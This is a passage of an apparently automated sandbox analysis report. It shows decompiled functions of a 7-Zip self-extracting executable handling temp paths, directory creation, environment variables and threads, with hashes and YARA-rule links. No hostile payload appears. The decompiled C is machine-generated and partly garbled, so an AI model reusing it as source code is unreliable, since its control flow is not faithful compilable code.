                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$ErrorLast$??2@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLibraryLoadLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                          • String ID: SfxFolder%02d$kernel32
                                          • API String ID: 2610933736-229743753
                                          • Opcode ID: 5704bae99d2f680e2cd2161521e4cdf17fabd0999d4abec73d9b09839c6add6b
                                          • Instruction ID: e45f6d1b6f058e368b4ee535d696ebea441a5b3f064171d76d7118da654f54dd
                                          • Opcode Fuzzy Hash: 5704bae99d2f680e2cd2161521e4cdf17fabd0999d4abec73d9b09839c6add6b
                                          • Instruction Fuzzy Hash: 8B21D3B2A0831467D730AF76AD4AB8A7BA8FB84345F40453FF405F61D0DAF84582CA4C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004042B5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004042B5(intOrPtr __edx, void* __eflags) {
				void* __ecx;
				void* _t8;
				long _t11;
				WCHAR* _t12;
				long _t17;
				short* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t34;
				WCHAR** _t35;
				short _t36;
				void* _t37;

				 *((intOrPtr*)(_t37 + 0x10)) = __edx;
				_t35 = _t24;
				E004147DF(_t8, _t24);
				_t11 = GetTempPathW(1, E0040420B(_t35, __edx, 2));
				_t36 = 0;
				_t35[1] = 0;
				 *( *_t35) = 0;
				if(_t11 > 0) {
					_t3 = _t11 + 1; // 0x1
					_t23 = _t3;
					GetTempPathW(_t23, E0040420B(_t35, 0, _t23));
					E004041F0(_t35);
				}
				_t12 = _t35[1];
				_t22 =  &(_t12[7]);
				_t34 = _t12 + _t12;
				while(1) {
					wsprintfW(E0040420B(_t35, 0, _t22) + _t34,  *(_t37 + 0x14), _t36);
					_t37 = _t37 + 0xc;
					E004041F0(_t35);
					_t17 = GetFileAttributesW( *_t35); // executed
					if(_t17 == 0xffffffff) {
						break;
					}
					_t36 = _t36 + 1;
					if(_t36 < 0xfff) {
						continue;
					}
					break;
				}
				return _t35;
			}















                                          0x004042ba
                                          0x004042be
                                          0x004042c0
                                          0x004042d7
                                          0x004042db
                                          0x004042df
                                          0x004042e2
                                          0x004042e7
                                          0x004042e9
                                          0x004042e9
                                          0x004042f6
                                          0x004042fa
                                          0x004042fa
                                          0x004042ff
                                          0x00404302
                                          0x00404305
                                          0x00404308
                                          0x00404318
                                          0x0040431e
                                          0x00404323
                                          0x0040432a
                                          0x00404333
                                          0x00000000
                                          0x00000000
                                          0x00404335
                                          0x0040433c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040433c
                                          0x00404345

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 0040420B: wcsncpy.MSVCRT ref: 00404239
                                            • Part of subcall function 0040420B: ??3@YAXPAX@Z.MSVCRT ref: 00404244
                                          • GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041DA3C,?,00000000,?,00405B0D), ref: 004042D7
                                          • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405B0D), ref: 004042F6
                                          • wsprintfW.USER32 ref: 00404318
                                          • GetFileAttributesW.KERNELBASE(?,?,?,00405B0D,?,?,?,?,?,?,?,?,?,?,00406FBC,00422844), ref: 0040432A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: PathTemp$??2@??3@AttributesFilewcsncpywsprintf
                                          • String ID: PreExtract
                                          • API String ID: 342973707-1883995278
                                          • Opcode ID: a6599ca690dd662ebfa5923f67b0ec3bebfb6a87c19678d5d5b6f9956c1d313b
                                          • Instruction ID: 23435fb80e171e00c8212a570b1b2e158bd2c4d8a66f38a82b80c7934b06bc9c
                                          • Opcode Fuzzy Hash: a6599ca690dd662ebfa5923f67b0ec3bebfb6a87c19678d5d5b6f9956c1d313b
                                          • Instruction Fuzzy Hash: 6E0126B03006185BC224AB6A9C49D2EF79DFFC4748B01447EF116D72E2CF7968068668
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407370, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E00407370(void* __ecx, void* __edx) {
				intOrPtr _v16;
				void* _t10;
				signed int _t12;
				void* _t15;
				void* _t30;

				_t30 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					__eflags =  *0x422774 & 0x00000080;
					if(__eflags == 0) {
						_t28 = L"7ZipSfx.%03x";
						_t10 = E004042B5(L"7ZipSfx.%03x", __eflags);
						_t6 = _t30 + 4; // 0x42286c
						E004148C7(_t6, _t10);
						_push(_v16);
						L0041C160();
						_t8 = _t30 + 4; // 0x9ded58, executed
						_t12 = E0040468A( *_t8, L"7ZipSfx.%03x"); // executed
						__eflags = _t12;
						if(_t12 != 0) {
							E00407370(_t30, _t28);
							_t9 = _t30 + 4; // 0x9ded58
							E00404F69(L"SfxVarApiPath",  *_t9, __eflags, 0);
							_t15 = E00407489();
						} else {
							_t15 = 0;
						}
						return _t15;
					}
					_t4 = _t30 + 4; // 0x42286c
					E004148C7(_t4, 0x422794);
				}
				return 1;
			}








                                          0x00407377
                                          0x0040737d
                                          0x00407383
                                          0x0040738a
                                          0x0040739c
                                          0x004073a4
                                          0x004073aa
                                          0x004073ad
                                          0x004073b2
                                          0x004073b5
                                          0x004073bb
                                          0x004073be
                                          0x004073c3
                                          0x004073c5
                                          0x004073cd
                                          0x004073d2
                                          0x004073dc
                                          0x004073e3
                                          0x004073c7
                                          0x004073c7
                                          0x004073c7
                                          0x00000000
                                          0x004073e8
                                          0x00407391
                                          0x00407394
                                          0x00407394
                                          0x00000000

                                          APIs
                                            • Part of subcall function 004042B5: GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041DA3C,?,00000000,?,00405B0D), ref: 004042D7
                                            • Part of subcall function 004042B5: GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405B0D), ref: 004042F6
                                            • Part of subcall function 004042B5: wsprintfW.USER32 ref: 00404318
                                            • Part of subcall function 004042B5: GetFileAttributesW.KERNELBASE(?,?,?,00405B0D,?,?,?,?,?,?,?,?,?,?,00406FBC,00422844), ref: 0040432A
                                            • Part of subcall function 004148C7: ??2@YAPAXI@Z.MSVCRT ref: 004148EF
                                            • Part of subcall function 004148C7: ??3@YAXPAX@Z.MSVCRT ref: 004148F8
                                            • Part of subcall function 004148C7: memcpy.MSVCRT ref: 00414912
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004073B5
                                            • Part of subcall function 0040468A: lstrlenW.KERNEL32(?,0042289C,004227B8,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 00404699
                                            • Part of subcall function 0040468A: GetSystemTimeAsFileTime.KERNEL32(00402D14,00000000,?,?,0042289C,004227B8,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 00404705
                                            • Part of subcall function 0040468A: GetFileAttributesW.KERNELBASE(00000000,?,?,0042289C,004227B8,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 0040470C
                                            • Part of subcall function 0040468A: ??3@YAXPAX@Z.MSVCRT ref: 004047BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@File$AttributesPathTempTime$??2@Systemlstrlenmemcpywsprintf
                                          • String ID: 7ZipSfx.%03x$PreExtract$SfxVarApiPath
                                          • API String ID: 1986220984-914423340
                                          • Opcode ID: 91033e12dfb82957aec606a5524c6763881c06e80c2b10e47ab0ee08e430d457
                                          • Instruction ID: 4fe307b9cc81ca859ba38963731d71e1e657172fdbf814944284d27904e1fcdc
                                          • Opcode Fuzzy Hash: 91033e12dfb82957aec606a5524c6763881c06e80c2b10e47ab0ee08e430d457
                                          • Instruction Fuzzy Hash: 30F08671A0C60266D6047726D952AFEB3556BC1704F10423FED11761D1DB7CB846E68F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402766, Relevance: 6.1, APIs: 4, Instructions: 99threadsynchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 43%
                                          			E00402766(void* __ecx, void* __edx, long _a4) {
				long _v8;
				void* _t12;
				void* _t13;
				long _t16;
				int _t18;
				intOrPtr _t23;
				void* _t29;
				void* _t34;

				_t29 = __edx;
				_push(__ecx);
				_t34 = __ecx;
				E004023C3(__ecx, _a4);
				 *0x422724 = _t34;
				 *0x422728 = 0; // executed
				_t12 = CreateThread(0, 0, E0040266D, _t34, 0,  &_v8); // executed
				 *0x422720 = _t12;
				if(_t12 != 0) {
					if( *0x422770 != 2) {
						E00408C2E(_t29);
						_t12 =  *0x422720; // 0x4f0
					}
					WaitForSingleObject(_t12, 0xffffffff);
					_t12 =  *0x422720; // 0x4f0
				}
				_t23 =  *0x422728; // 0x0
				 *0x4228c4 = 0;
				if(_t23 == 0) {
					_a4 = 0;
					__eflags =  *0x4228cc; // 0x0
					if(__eflags != 0) {
						goto L27;
					} else {
						__eflags = _t12;
						if(_t12 == 0) {
							L20:
							__eflags = (_a4 & 0x80070000) - 0x80070000;
							if((_a4 & 0x80070000) == 0x80070000) {
								_t16 = _a4 & 0x0000ffff;
								__eflags = _t16 - 0xe;
								if(_t16 != 0xe) {
									L25:
									SetLastError(_t16);
									_push(_a4);
									_push(0x22);
									_push(1);
									goto L26;
								} else {
									__eflags =  *0x422774 - 0xffffffff;
									if( *0x422774 != 0xffffffff) {
										goto L25;
									}
								}
							} else {
								_push(_a4);
								_push(0x21);
								goto L22;
							}
							goto L27;
						} else {
							_t18 = GetExitCodeThread(_t12,  &_a4); // executed
							__eflags = _t18;
							if(_t18 == 0) {
								goto L20;
							} else {
								__eflags = _a4;
								if(_a4 != 0) {
									goto L20;
								} else {
									_t13 = 0;
								}
							}
						}
					}
				} else {
					if(_t23 == 1) {
						_push(0x11);
						goto L14;
					} else {
						if(_t23 == 2) {
							_push(0x13);
							goto L14;
						} else {
							if(_t23 == 3) {
								_push(0x12);
								L14:
								_push(0);
								E00409684(_t29);
							} else {
								if(_t23 <= 0x67 || _t23 > 0x6b) {
									_push(_t23);
									_push(0x14);
									L22:
									_push(0);
									L26:
									E00409684(_t29);
								}
							}
						}
					}
					L27:
					_t13 = 0x80004005;
				}
				return _t13;
			}











                                          0x00402766
                                          0x00402769
                                          0x0040276f
                                          0x00402771
                                          0x00402785
                                          0x0040278b
                                          0x00402791
                                          0x00402797
                                          0x0040279e
                                          0x004027a7
                                          0x004027a9
                                          0x004027ae
                                          0x004027ae
                                          0x004027b6
                                          0x004027bc
                                          0x004027bc
                                          0x004027c1
                                          0x004027c7
                                          0x004027cf
                                          0x00402807
                                          0x0040280a
                                          0x00402810
                                          0x00000000
                                          0x00402812
                                          0x00402812
                                          0x00402814
                                          0x0040282e
                                          0x00402838
                                          0x0040283a
                                          0x00402847
                                          0x0040284c
                                          0x0040284f
                                          0x0040285a
                                          0x0040285b
                                          0x00402861
                                          0x00402864
                                          0x00402866
                                          0x00000000
                                          0x00402851
                                          0x00402851
                                          0x00402858
                                          0x00000000
                                          0x00000000
                                          0x00402858
                                          0x0040283c
                                          0x0040283c
                                          0x0040283f
                                          0x00000000
                                          0x0040283f
                                          0x00000000
                                          0x00402816
                                          0x0040281b
                                          0x00402821
                                          0x00402823
                                          0x00000000
                                          0x00402825
                                          0x00402825
                                          0x00402828
                                          0x00000000
                                          0x0040282a
                                          0x0040282a
                                          0x0040282a
                                          0x00402828
                                          0x00402823
                                          0x00402814
                                          0x004027d1
                                          0x004027d4
                                          0x004027fb
                                          0x00000000
                                          0x004027d6
                                          0x004027d9
                                          0x004027f7
                                          0x00000000
                                          0x004027db
                                          0x004027de
                                          0x004027f3
                                          0x004027fd
                                          0x004027fd
                                          0x004027fe
                                          0x004027e0
                                          0x004027e3
                                          0x004027ee
                                          0x004027ef
                                          0x00402841
                                          0x00402841
                                          0x00402868
                                          0x00402868
                                          0x0040286d
                                          0x004027e3
                                          0x004027de
                                          0x004027d9
                                          0x00402870
                                          0x00402870
                                          0x00402870
                                          0x00402878

                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,0040266D,?,00000000,00422868), ref: 00402791
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00402F5E,?,PreExtract,0041DA3C,00422868), ref: 004027B6
                                          • GetExitCodeThread.KERNELBASE(00000000,0041DA3C,?,00402F5E,?,PreExtract,0041DA3C,00422868), ref: 0040281B
                                          • SetLastError.KERNEL32(0041DA3C,?,00402F5E,?,PreExtract,0041DA3C,00422868), ref: 0040285B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Thread$CodeCreateErrorExitLastObjectSingleWait
                                          • String ID:
                                          • API String ID: 2732711357-0
                                          • Opcode ID: 1b51eaa3d26ec7de34c3eda44a3e7a89e55e6884e40329cd3d07ffc2fed94f50
                                          • Instruction ID: 52b85191acae3594b2b3cce7403cca4ac0ffd9d7b5e3f01322180d9e18f1f29e
                                          • Opcode Fuzzy Hash: 1b51eaa3d26ec7de34c3eda44a3e7a89e55e6884e40329cd3d07ffc2fed94f50
                                          • Instruction Fuzzy Hash: 36310976604200BACF396B11DE4DE7B36A4FB85750B20833BF501B62E0DAF8C881D66D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403092, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E00403092(WCHAR* __ecx) {
				int _t2;
				long _t5;
				signed char _t6;
				WCHAR* _t9;

				_t9 = __ecx;
				_t2 = CreateDirectoryW(__ecx, 0); // executed
				if(_t2 != 0) {
					L7:
					return 1;
				}
				_t5 = GetLastError();
				if(_t5 == 0xb7) {
					_t6 = GetFileAttributesW(_t9); // executed
					if(_t6 == 0xffffffff || (_t6 & 0x00000010) != 0) {
						goto L7;
					} else {
						_push(0xb7);
						L3:
						SetLastError();
						return 0;
					}
				}
				_push(_t5);
				goto L3;
			}







                                          0x00403094
                                          0x00403099
                                          0x004030a1
                                          0x004030d0
                                          0x00000000
                                          0x004030d2
                                          0x004030a3
                                          0x004030b0
                                          0x004030be
                                          0x004030c7
                                          0x00000000
                                          0x004030cd
                                          0x004030cd
                                          0x004030b3
                                          0x004030b3
                                          0x00000000
                                          0x004030b9
                                          0x004030c7
                                          0x004030b2
                                          0x00000000

                                          APIs
                                          • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,-00000001,004046FD,00000000,?,?,0042289C,004227B8,00000000,?,?,?,00402D14,PreExtract), ref: 00403099
                                          • GetLastError.KERNEL32(?,?,0042289C,004227B8,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 004030A3
                                          • SetLastError.KERNEL32(000000B7,?,?,0042289C,004227B8,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 004030B3
                                          • GetFileAttributesW.KERNELBASE(00000000,?,?,0042289C,004227B8,00000000,?,?,?,00402D14,PreExtract,0041DA3C,00422868), ref: 004030BE
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast$AttributesCreateDirectoryFile
                                          • String ID:
                                          • API String ID: 635176117-0
                                          • Opcode ID: c5cc671423ab482ec682e2615689a590c7d79424ef60dffe5937396f84b5532a
                                          • Instruction ID: a770e4f8708b8688440dc55708b068f6f30b91d097a371ede7b7596a26aef620
                                          • Opcode Fuzzy Hash: c5cc671423ab482ec682e2615689a590c7d79424ef60dffe5937396f84b5532a
                                          • Instruction Fuzzy Hash: 65E0DF70B421106BE6201F34AC0CBBB3EAC9F86723F200572F406F02E8D738A902416E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004059A3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E004059A3(intOrPtr __ecx, void* __edx, void* __eflags, signed short* _a4, char _a7, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v24;
				void* _t23;
				signed int _t25;
				signed int _t27;
				void* _t34;
				signed short* _t48;
				signed short* _t49;

				_v12 = __ecx;
				_t34 = __edx;
				E004147DF(_t23,  &_v24);
				_t48 = _a4;
				_t49 = _t48;
				_a7 = 0;
				while(1) {
					L1:
					_t25 =  *_t49 & 0x0000ffff;
					if(_t25 >= 0x30 && _t25 <= 0x39) {
					}
					L9:
					E00414864( &_v24, _t34);
					E00401585( &_v24,  *_t49 & 0x0000ffff);
					_v8 = _v8 & 0x00000000;
					_t49 =  &(_t49[1]);
					if(E00404F59() == 0) {
						L1:
						_t25 =  *_t49 & 0x0000ffff;
						if(_t25 >= 0x30 && _t25 <= 0x39) {
						}
						goto L3;
					} else {
						L10:
						_a7 = 1;
						do {
							_v12();
							_v8 = _v8 + 1;
						} while (E00404F59() != 0);
						do {
							goto L1;
						} while (E00404F59() == 0);
						goto L10;
					}
					L13:
					_t27 = _a8;
					__eflags = _t27;
					if(_t27 != 0) {
						__eflags = _t27 - 1;
						if(__eflags == 0) {
							L19:
							_t27 = E004059A3(_v12, _t34, __eflags, 0x41d648, 0xffffffff);
						} else {
							_t27 =  *_t48 & 0x0000ffff;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								__eflags = _a7;
								if(_a7 == 0) {
									__eflags = _t27;
									if(__eflags != 0) {
										goto L19;
									}
								}
							} else {
								__eflags = _a8 - 0xffffffff;
								if(_a8 != 0xffffffff) {
									goto L17;
								}
							}
						}
					}
					_push(_v24);
					L0041C160();
					return _t27;
					L3:
					if(_t25 >= 0x61 && _t25 <= 0x7a) {
						goto L9;
					}
					if(_t25 >= 0x41 && _t25 <= 0x5a) {
						goto L9;
					}
					if(_t48 == _t49 && _a8 == 0xffffffff) {
						goto L9;
					}
					goto L13;
				}
			}












                                          0x004059ab
                                          0x004059b2
                                          0x004059b4
                                          0x004059b9
                                          0x004059bc
                                          0x004059be
                                          0x004059c2
                                          0x004059c2
                                          0x004059c2
                                          0x004059c8
                                          0x004059c8
                                          0x004059ed
                                          0x004059f1
                                          0x004059fd
                                          0x00405a05
                                          0x00405a0c
                                          0x00405a16
                                          0x004059c2
                                          0x004059c2
                                          0x004059c8
                                          0x004059c8
                                          0x00000000
                                          0x00405a18
                                          0x00405a18
                                          0x00405a18
                                          0x00405a1c
                                          0x00405a1e
                                          0x00405a24
                                          0x00405a2f
                                          0x004059c2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004059c2
                                          0x00405a35
                                          0x00405a38
                                          0x00405a38
                                          0x00405a3b
                                          0x00405a3d
                                          0x00405a3e
                                          0x00405a59
                                          0x00405a65
                                          0x00405a40
                                          0x00405a40
                                          0x00405a43
                                          0x00405a46
                                          0x00405a4e
                                          0x00405a4e
                                          0x00405a52
                                          0x00405a54
                                          0x00405a57
                                          0x00000000
                                          0x00000000
                                          0x00405a57
                                          0x00405a48
                                          0x00405a48
                                          0x00405a4c
                                          0x00000000
                                          0x00000000
                                          0x00405a4c
                                          0x00405a46
                                          0x00405a3e
                                          0x00405a6a
                                          0x00405a6d
                                          0x00405a77
                                          0x004059cf
                                          0x004059d2
                                          0x00000000
                                          0x00000000
                                          0x004059dc
                                          0x00000000
                                          0x00000000
                                          0x004059e5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004059e5

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405A6D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@??3@
                                          • String ID: PreExtract$Shortcut
                                          • API String ID: 1936579350-2482910946
                                          • Opcode ID: fd855a89beda8bffe87f1ea3e8d631ac94191901ec90a8c98a2cf448033a5da7
                                          • Instruction ID: f0f3e7433b1fc6c74c74fcfde131b98a5d6d07456df403abe6898ee91eb4b0a3
                                          • Opcode Fuzzy Hash: fd855a89beda8bffe87f1ea3e8d631ac94191901ec90a8c98a2cf448033a5da7
                                          • Instruction Fuzzy Hash: 632185B4A00605DACF24EA55C5856BF7775DF41728F20463BE861B62C1DA7C8E80CE69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004022F7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E004022F7(intOrPtr __ecx, intOrPtr __edx, signed short* _a4, intOrPtr* _a8, signed int _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v40;
				signed int _t34;
				signed short* _t55;
				intOrPtr* _t58;

				_v8 = _v8 & 0x00000000;
				_v12 = __ecx;
				_v16 = __edx;
				E00414803( &_v28, __ecx);
				_t55 = _a4;
				E00401585( &_v28,  *_t55 & 0x0000ffff);
				_t58 = _a8;
				L1:
				while(E00404F59() == 0) {
					_t55 =  &(_t55[1]);
					_t34 =  *_t55 & 0x0000ffff;
					if(_t34 >= 0x30 && _t34 <= 0x39) {
						L8:
						E00414864( &_v28, _v12);
						E00401585( &_v28,  *_t55 & 0x0000ffff);
						_v8 = _v8 & 0x00000000;
						continue;
					}
					if(_t34 >= 0x61 && _t34 <= 0x7a) {
						goto L8;
					}
					if(_t34 >= 0x41 && _t34 <= 0x5a) {
						goto L8;
					}
					_push(_v28);
					L0041C160();
					return 1;
				}
				E00414803( &_v40, _t30);
				E00402008( &_v40, _v16, 0, _t58, _a12); // executed
				_push(_v40);
				L0041C160();
				 *(_t58 + 4) =  *(_t58 + 4) & 0x00000000;
				 *((short*)( *_t58)) = 0;
				_v8 = _v8 + 1;
				_a12 = 0x41da3c;
				goto L1;
			}











                                          0x004022fd
                                          0x00402303
                                          0x0040230a
                                          0x0040230d
                                          0x00402312
                                          0x0040231c
                                          0x00402321
                                          0x00000000
                                          0x00402324
                                          0x00402333
                                          0x00402336
                                          0x0040233c
                                          0x00402357
                                          0x0040235d
                                          0x00402369
                                          0x0040236e
                                          0x00000000
                                          0x0040236e
                                          0x00402346
                                          0x00000000
                                          0x00000000
                                          0x00402350
                                          0x00000000
                                          0x00000000
                                          0x004023b1
                                          0x004023b4
                                          0x004023c0
                                          0x004023c0
                                          0x00402378
                                          0x00402389
                                          0x0040238e
                                          0x00402391
                                          0x00402396
                                          0x0040239f
                                          0x004023a2
                                          0x004023a5
                                          0x00000000

                                          APIs
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00402391
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004023B4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$memcpy
                                          • String ID: PreExtract
                                          • API String ID: 750647942-1883995278
                                          • Opcode ID: 52f83685f1c84083f7c54d8613a1132cb1ca08bc402b8db5cc9e7b91f9475ac2
                                          • Instruction ID: a2b2535204d0bd1d40afa8a24637eeedcdabe34f3f30c0d4779eef0099d19ea4
                                          • Opcode Fuzzy Hash: 52f83685f1c84083f7c54d8613a1132cb1ca08bc402b8db5cc9e7b91f9475ac2
                                          • Instruction Fuzzy Hash: A7216071810109EBCF18EFA1C986AEEB775EF55714F20446BE901B21D0EB789A85CA98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405D92, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E00405D92() {
				WCHAR* _v16;
				int _t9;
				intOrPtr _t10;
				intOrPtr _t15;
				signed int _t20;
				void* _t21;
				void* _t22;

				_t20 = 0;
				_t21 =  *0x42278c - _t20; // 0xa1
				if(_t21 > 0) {
					do {
						_t10 =  *0x422788; // 0x2215e88
						E00414839( &_v16,  *((intOrPtr*)(_t10 + _t20 * 4)) + 0xc);
						E00405546( &_v16, _t21);
						_t15 =  *0x422788; // 0x2215e88
						_t9 = SetEnvironmentVariableW( *( *(_t15 + _t20 * 4)), _v16); // executed
						_push(_v16);
						L0041C160();
						_t20 = _t20 + 1;
						_t22 = _t20 -  *0x42278c; // 0xa1
					} while (_t22 < 0);
				}
				return _t9;
			}










                                          0x00405d99
                                          0x00405d9b
                                          0x00405da1
                                          0x00405da3
                                          0x00405da3
                                          0x00405db2
                                          0x00405dba
                                          0x00405dbf
                                          0x00405dcc
                                          0x00405dd2
                                          0x00405dd5
                                          0x00405dda
                                          0x00405ddc
                                          0x00405ddc
                                          0x00405da3
                                          0x00405de6

                                          APIs
                                            • Part of subcall function 00414839: memcpy.MSVCRT ref: 00414855
                                          • SetEnvironmentVariableW.KERNELBASE(009DB5F0,00000000,009DB5E4,SetEnvironment,00000000,?,00000000), ref: 00405DCC
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405DD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@EnvironmentVariablememcpy
                                          • String ID: SetEnvironment
                                          • API String ID: 357128876-360490078
                                          • Opcode ID: 1ac5f1f97e4f3c32b998e43d765b040d78eecc16947c32a8e13cdb82ca0686e7
                                          • Instruction ID: 2e0a3868ca799af050514896d9321bb707874ea1176aa78625a46d01673c73f0
                                          • Opcode Fuzzy Hash: 1ac5f1f97e4f3c32b998e43d765b040d78eecc16947c32a8e13cdb82ca0686e7
                                          • Instruction Fuzzy Hash: F0F05831A04028BFCB10AB98ED4188EB7B4EF44304B80807AE411A7162DB70E942DF8A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403ECA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00403ECA() {
				signed short _v40;
				_Unknown_base(*)()* _t3;

				_t3 = GetProcAddress( *0x42275c, "GetNativeSystemInfo");
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3( &_v40); // executed
					return _v40 & 0x0000ffff;
				}
			}





                                          0x00403edb
                                          0x00403ee3
                                          0x00403ef4
                                          0x00403ee5
                                          0x00403ee9
                                          0x00403ef0
                                          0x00403ef0

                                          APIs
